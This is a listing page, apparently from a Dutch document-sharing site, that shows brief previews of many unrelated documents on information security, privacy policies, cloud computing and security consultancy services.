Factsheet SECURITY CONSULTANCY Managed Services

Factsheet SECURITY CONSULTANCY Managed Services Factsheet SECURITY CONSULTANCY Managed Services SECURITY CONSULTANCY Managed Services We adviseren u over passende security-maatregelen voor uw digitale platform. Zo helpen we u incidenten als datadiefstal

Nadere informatie

Het Sebyde aanbod. Secure By Design. AUG 2012 Sebyde BV

Het Sebyde aanbod. Secure By Design. AUG 2012 Sebyde BV Het Sebyde aanbod Secure By Design AUG 2012 Sebyde BV Wat bieden wij aan? 1. Web Applicatie Security Audit 2. Secure Development 3. Security Awareness Training 4. Security Quick Scan 1. Web Applicatie

Nadere informatie

DigiD SSL. Versie 2.1.1. Datum 16 augustus 2010 Status Definitief

DigiD SSL. Versie 2.1.1. Datum 16 augustus 2010 Status Definitief DigiD SSL Versie 2.1.1 Datum 16 augustus 2010 Status Definitief Colofon Projectnaam DigiD Versienummer 2.1.1 Organisatie Logius Postbus 96810 2509 JE Den Haag servicecentrum@logius.nl Pagina 2 van 9 Inhoud

Nadere informatie

INFORMATIEBEVEILIGING: WAAR STAAT U NU?

INFORMATIEBEVEILIGING: WAAR STAAT U NU? INFORMATIEBEVEILIGING: WAAR STAAT U NU? HANDIGE CHECKLISTS VOOR DE OVERHEIDSSECTOR In deze whitepaper bieden we u handvatten en checklists voor hoe u om kunt gaan met de nieuwe meldplicht datalekken. Steeds

Nadere informatie

PRIVACYVERKLARING PARKINSON VERENIGING

PRIVACYVERKLARING PARKINSON VERENIGING PRIVACYVERKLARING PARKINSON VERENIGING Via de website (www.parkinson-vereniging.nl) en het platform, waar u een Persoonlijk Parkinson Dossier kunt aanmaken, van De Parkinson Vereniging worden privacygevoelige

Nadere informatie

THE CLOUD IN JURIDISCH PERSPECTIEF SPREKERSPROFIEL. Mr. Jan van Noord Directeur International Tender Services (ITS) BV

THE CLOUD IN JURIDISCH PERSPECTIEF SPREKERSPROFIEL. Mr. Jan van Noord Directeur International Tender Services (ITS) BV THE CLOUD IN JURIDISCH PERSPECTIEF SPREKERSPROFIEL Mr. Jan van Noord Directeur International Tender Services (ITS) BV Wat is Cloud Op het moment dat content uit het eigen beheer c.q. toezicht verdwijnt

Nadere informatie

Berry Kok. Navara Risk Advisory

Berry Kok. Navara Risk Advisory Berry Kok Navara Risk Advisory Topics Informatiebeveiliging in het nieuws Annual Benchmark on Patient Privacy & Data Security Informatiebeveiliging in de zorg Extra uitdaging: mobiel Informatiebeveiliging

Nadere informatie

privacy statement WerkvoorWerk.nl Privacy Statement aandachtig door te nemen. De schuin geschreven gebruiksvoorwaarden van WerkvoorWerk.nl.

privacy statement WerkvoorWerk.nl Privacy Statement aandachtig door te nemen. De schuin geschreven gebruiksvoorwaarden van WerkvoorWerk.nl. privacy statement WerkvoorWerk.nl WerkvoorWerk.nl neemt de privacy van haar gebruikers zeer serieus en zal informatie over u op een veilige manier verwerken en gebruiken. In dit document wordt het Privacy

Nadere informatie

Naam: Sander van Schie Datum: 28-03-2014 Klas: SBICO-IB2 Doel: Uitleg Toegang tot vcloud Doelgroep: Nieuwe cursisten Versie: 1.0.0

Naam: Sander van Schie Datum: 28-03-2014 Klas: SBICO-IB2 Doel: Uitleg Toegang tot vcloud Doelgroep: Nieuwe cursisten Versie: 1.0.0 Naam: Sander van Schie Datum: 28-03-2014 Klas: SBICO-IB2 Doel: Uitleg Toegang tot vcloud Doelgroep: Nieuwe cursisten Versie: 1.0.0 1 Inhoudsopgave Inleiding... 3 Stap 1: Inloggegevens en wachtwoord...

Nadere informatie

Factsheet SECURITY DESIGN Managed Services

Factsheet SECURITY DESIGN Managed Services Factsheet SECURITY DESIGN Managed Services SECURITY DESIGN Managed Services We ontwerpen solide security-maatregelen voor de bouw en het gebruik van digitale platformen. Met onze Security Management diensten

Nadere informatie

Hardening. Een operationeel product op basis van de Baseline Informatiebeveiliging Rijksdienst (BIR)

Hardening. Een operationeel product op basis van de Baseline Informatiebeveiliging Rijksdienst (BIR) Hardening Een operationeel product op basis van de Baseline Informatiebeveiliging Rijksdienst (BIR) Colofon Onderhavig operationeel product, behorende bij de Baseline Informatiebeveiliging Rijksdienst

Nadere informatie

My Name is Moens, Alf Moens >> 0 >> 1 >> 2 >> 3 >> 4 >>

My Name is Moens, Alf Moens >> 0 >> 1 >> 2 >> 3 >> 4 >> My Name is Moens, Alf Moens >> 0 >> 1 >> 2 >> 3 >> 4 >> Granted to Alf Moens License to Kill any network connection that is abused, is using extensive bandwidth, has been hacked or otherwise compromised,

Nadere informatie

Quickstart handleiding

Quickstart handleiding Inleiding Allereerst hartelijk bedankt voor het aanschaffen van. U heeft met deze aankoop een goede keuze gemaakt voor een zeer professionele E-mail marketing tool. In deze quickstart handleiding zullen

Nadere informatie

PRIVACYVERKLARING PARKINSON VERENIGING

PRIVACYVERKLARING PARKINSON VERENIGING PRIVACYVERKLARING PARKINSON VERENIGING Via de website (www.parkinson-vereniging.nl) en het platform, waar u een Persoonlijk Parkinson Dossier kunt aanmaken, van De Parkinson Vereniging worden privacygevoelige

Nadere informatie

Whitepaper. Veilig de cloud in. Whitepaper over het gebruik van Cloud-diensten deel 1. www.traxion.com

Whitepaper. Veilig de cloud in. Whitepaper over het gebruik van Cloud-diensten deel 1. www.traxion.com Veilig de cloud in Whitepaper over het gebruik van Cloud-diensten deel 1 www.traxion.com Introductie Deze whitepaper beschrijft de integratie aspecten van clouddiensten. Wat wij merken is dat veel organisaties

Nadere informatie

Factsheet Enterprise Mobility

Factsheet Enterprise Mobility Factsheet Enterprise Mobility www.vxcompany.com Informatie willen we overal, altijd en op elk device beschikbaar hebben. Privé, maar zeker ook zakelijk. Met het gebruik van mobile devices zoals smartphones

Nadere informatie

Certs 101. Een introductie in Digitale Certificaten. J. Wren Hunt oktober 2004 wren@cacert.org. Copyright, 1996 Dale Carnegie & Associates, Inc.

Certs 101. Een introductie in Digitale Certificaten. J. Wren Hunt oktober 2004 wren@cacert.org. Copyright, 1996 Dale Carnegie & Associates, Inc. Certs 101 Een introductie in Digitale Certificaten J. Wren Hunt oktober 2004 wren@cacert.org vertaling Hans Verbeek h.j.verbeek@kader.hcc.nl Copyright, 1996 Dale Carnegie & Associates, Inc. Wat behandelen

Nadere informatie

Je bent zichtbaarder dan je denkt Een programma over cyber security awareness. Informatie voor managers

Je bent zichtbaarder dan je denkt Een programma over cyber security awareness. Informatie voor managers Je bent zichtbaarder dan je denkt Een programma over cyber security awareness Informatie voor managers Je bent zichtbaarder dan je denkt Informatie voor managers 2 Voorwoord Het cybersecuritybeeld van

Nadere informatie

Praktisch omgaan met Privacy & Security en het Wbp

Praktisch omgaan met Privacy & Security en het Wbp 2-daagse praktijktraining Praktisch omgaan met Privacy & Security en het Wbp Programma Praktisch omgaan met Privacy & Security en het Wbp De training Praktisch omgaan met Privacy & Security en het Wbp

Nadere informatie

Gebruikersinstructie Toegang tot Dienstenportaal via Webapplicatie (Internet Explorer) t.b.v. Repad

Gebruikersinstructie Toegang tot Dienstenportaal via Webapplicatie (Internet Explorer) t.b.v. Repad Gebruikersinstructie Toegang tot Dienstenportaal via Webapplicatie (Internet Explorer) t.b.v. Repad Versie 1.0 Gebruikersinstructie toegang Dienstenportaal versie 1.0 Colofon Afzendgegevens Dienst Justitiële

Nadere informatie

Rechtsorde.nl. Juridisch informatieportaal. Toelichting Kluwer content-in-context

Rechtsorde.nl. Juridisch informatieportaal. Toelichting Kluwer content-in-context Rechtsorde.nl Juridisch informatieportaal Toelichting Kluwer content-in-context Document versie 1.4 10 oktober 2011 1. Inhoud 1. Inhoud 2 2. Introductie 3 3. Benodigde browserinstellingen 4 > Ondersteunde

Nadere informatie

SURFconext Cookbook. Het koppelen van LimeSurvey aan SURFconext. Versie: 1.0. Datum: 4 december 2013. 030-2 305 305 admin@surfnet.nl www.surfnet.

SURFconext Cookbook. Het koppelen van LimeSurvey aan SURFconext. Versie: 1.0. Datum: 4 december 2013. 030-2 305 305 admin@surfnet.nl www.surfnet. SURFconext Cookbook Het koppelen van LimeSurvey aan SURFconext Auteur(s): Frank Niesten Versie: 1.0 Datum: 4 december 2013 Radboudkwartier 273 3511 CK Utrecht Postbus 19035 3501 DA Utrecht 030-2 305 305

Nadere informatie

Curriculum Vitae Ishak Atak. www.ishakatak.nl. Naam : Ishak Atak Roepnaam : Ishak. Woonplaats : Utrecht Geboorte datum : 13-05-1983

Curriculum Vitae Ishak Atak. www.ishakatak.nl. Naam : Ishak Atak Roepnaam : Ishak. Woonplaats : Utrecht Geboorte datum : 13-05-1983 Naam : Ishak Atak Roepnaam : Ishak Woonplaats : Utrecht Geboorte datum : 13-05-1983 Tel. : +316-46 17 76 00 Beschikbaar : Full time December 2015 Email: : contact@ishakatak.nl Datum CV : November 2015

Nadere informatie

Informatiebeveiliging in de 21 e eeuw

Informatiebeveiliging in de 21 e eeuw Informatiebeveiliging in de 21 e eeuw beveiliging van de cloud webapplicatiepenetratietests vulnerability-assessments 12 maart 2012 R.C.J. (Rob) Himmelreich MSIT, CISA, CRISC Introductie Rob Himmelreich

Nadere informatie

Deze privacy policy is van toepassing op de verwerking van persoonsgegevens van gebruikers van de websites en apps van McDiver.

Deze privacy policy is van toepassing op de verwerking van persoonsgegevens van gebruikers van de websites en apps van McDiver. Privacy Policy Wij respecteren jouw privacy. Jouw gegevens worden niet ongevraagd met derden gedeeld en je kunt zelf beslissen welke gegevens je wel of juist niet online wilt delen. Benieuwd naar alle

Nadere informatie

Plan van Aanpak beschikbaar stellen broncode Basisregistratie Personen (BRP)

Plan van Aanpak beschikbaar stellen broncode Basisregistratie Personen (BRP) Plan van Aanpak beschikbaar stellen broncode Basisregistratie Personen (BRP) Samenvatting De minister van Binnenlandse Zaken en Koninkrijksrelaties (BZK) heeft in de Tweede Kamer toegezegd de broncode

Nadere informatie

We helpen u security-incidenten te voorkomen

We helpen u security-incidenten te voorkomen Managed Services Managed Services We adviseren u over passende security-maatregelen voor uw digitale platform. Zo helpen we u incidenten als datadiefstal te voorkomen en behoeden we u voor imagoschade.

Nadere informatie

Framework Secure Software Secure software in de strijd tegen cybercrime

Framework Secure Software Secure software in de strijd tegen cybercrime Framework Secure Software Secure software in de strijd tegen cybercrime Woensdag 8 oktober 2014 Postillion Hotel Utrecht Bunnik Fred Hendriks (directeur a.i. Secure Software Foundation) Tim Hemel (CTO

Nadere informatie

Identify and mitigate your IT risk

Identify and mitigate your IT risk Identify and mitigate your IT risk ICT risico = bedrijfsrisico In de ontwikkeling die organisaties doormaken, speelt ICT een belangrijke rol. ICT heeft bedrijfsprocessen efficiënter en effectiever gemaakt.

Nadere informatie

Kijken, kiezen, maar wat te kopen?

Kijken, kiezen, maar wat te kopen? Kijken, kiezen, maar wat te kopen? 15 aandachtspunten bij overgang naar de cloud Cloud biedt voor veel organisaties de mogelijkheid om te innoveren zonder hoge investeringen. Zowel Telecom providers als

Nadere informatie

Welkom bij parallellijn 1 On the Move 14.20 15.10 uur

Welkom bij parallellijn 1 On the Move 14.20 15.10 uur Welkom bij parallellijn 1 On the Move 14.20 15.10 uur Stap 4 van de BIG Hoe stel ik vast of de informatiebeveiligingsmaatregelen van mijn gemeente effectief zijn en hoe rapporteer ik hierover? 1 IBD-Praktijkdag

Nadere informatie

Security Health Check

Security Health Check Factsheet Security Health Check De beveiligingsthermometer in uw organisatie DUIJNBORGH - FORTIVISION Stadionstraat 1a 4815NC Breda +31 (0) 88 16 1780 www.db-fortivision.nl info@db-fortivision.nl De Security

Nadere informatie

Beknopte dienstbeschrijving beveiligen van Webapplicaties m.b.v. digitale certificaten en PKI

Beknopte dienstbeschrijving beveiligen van Webapplicaties m.b.v. digitale certificaten en PKI Beknopte dienstbeschrijving beveiligen van Webapplicaties m.b.v. digitale certificaten en PKI Document: Beknopte dienstbeschrijving beveiligen van Webapplicaties Versie: maart 2002 mei 2002 Beknopte dienstbeschrijving

Nadere informatie

Seminar! BETEKENIS VAN INTERNE AUDIT voor specifieke verzekeraars! Informatiebeveiliging the next level!

Seminar! BETEKENIS VAN INTERNE AUDIT voor specifieke verzekeraars! Informatiebeveiliging the next level! Seminar! BETEKENIS VAN INTERNE AUDIT voor specifieke verzekeraars! Informatiebeveiliging the next level! 1! 1. Introductie Agenda! 2. Stand van zaken in de Cyber Security wereld 3. Verschillende soorten

Nadere informatie

Informatiebeveiligingsdienst Aansluiten, waarom eigenlijk Assen, 6 Maart 2014. Anita van Nieuwenborg

Informatiebeveiligingsdienst Aansluiten, waarom eigenlijk Assen, 6 Maart 2014. Anita van Nieuwenborg Informatiebeveiligingsdienst Aansluiten, waarom eigenlijk Assen, 6 Maart 2014 Anita van Nieuwenborg Programma 1. De IBD 2. Dienstverlening van de IBD 3. Het stappenplan Aansluiten bij de IBD 4. Dialoog

Nadere informatie

PRIVACY STATEMENT. Toelichting De informatie die Facturis uit uw antwoorden verkrijgt, bestaat onder andere uit de volgende informatie:

PRIVACY STATEMENT. Toelichting De informatie die Facturis uit uw antwoorden verkrijgt, bestaat onder andere uit de volgende informatie: PRIVACY STATEMENT De Diensten van Facturis zijn gericht op ondernemingen en ondernemers. Toch worden er persoonsgegevens verwerkt, van jou als zelfstandig ondernemer of van jou als contactpersoon namens

Nadere informatie

Norm ICT-beveiligingsassessments DigiD

Norm ICT-beveiligingsassessments DigiD Norm ICT-beveiligingsassessments DigiD Versie 1.0 Datum 21 februari 2012 Status Definitief Colofon Projectnaam DigiD Versienummer 1.0 Contactpersoon Servicecentrum Logius Organisatie Logius Postbus 96810

Nadere informatie

Beveiligingsbeleid Stichting Kennisnet

Beveiligingsbeleid Stichting Kennisnet Beveiligingsbeleid Stichting Kennisnet AAN VAN Jerry van de Leur (Security Officer) DATUM ONDERWERP Disclaimer: Kennisnet geeft geen enkele garantie, met betrekking tot de geschiktheid voor een specifiek

Nadere informatie

Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag

Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag Aan de Voorzitter van de Tweede Kamer der Staten- Generaal Postbus 20018 2500 EA Den Haag www.rijksoverheid.nl www.facebook.com/minbzk www.twitter.com/minbzk Uw kenmerk 2016Z05065 Datum Betreft Beantwoording

Nadere informatie

Bijlage 2 Beveiligingsplan. Informatiebeveiliging

Bijlage 2 Beveiligingsplan. Informatiebeveiliging Bijlage 2 Beveiligingsplan Informatiebeveiliging De verantwoordelijkheid voor informatiebeveiliging ligt bij het dagelijks bestuur. In de DB-vergadering van 31 augustus 2015 is stilgestaan bij een aantal

Nadere informatie

NBV themanummer Nieuwsbrief December 2010

NBV themanummer Nieuwsbrief December 2010 December 2010 NBV themanummer Nieuwsbrief December 2010 Het Nationaal Bureau Verbindingsbeveiliging (NBV), onderdeel van de AIVD, geeft voor zijn relaties tweemaandelijks een nieuwsbrief uit. Dit is een

Nadere informatie

HANDLEIDING TOOLS4EVER ISUPPORT ONLINE WEBOMGEVING

HANDLEIDING TOOLS4EVER ISUPPORT ONLINE WEBOMGEVING HANDLEIDING TOOLS4EVER ISUPPORT ONLINE WEBOMGEVING Inhoudsopgave 1. Belangrijkste spelregels... 3 2. Contact met tools4ever international support... 4 isupport webomgeving... 4 Eerste maal inloggen...

Nadere informatie

Op 30 september 2011 heeft de VNG dit bericht naar alle gemeenten verstuurd:

Op 30 september 2011 heeft de VNG dit bericht naar alle gemeenten verstuurd: onderwerp: van: Wethouder Kroon aan: gemeenteraad datum: 11 oktober 2011 Beveiliging websites gemeente Doetinchem Beveiliging en continuïteit maken een belangrijk onderdeel uit van onze bedrijfsvoering.

Nadere informatie

IAM en Cloud Computing

IAM en Cloud Computing IAM en Cloud Computing Cloud café 14 Februari 2013 W: http://www.identitynext.eu T: @identitynext www.everett.nl www.everett.nl Agenda 1. Introductie 2. IAM 3. Cloud 4. IAM en Cloud 5. Uitdagingen 6. Tips

Nadere informatie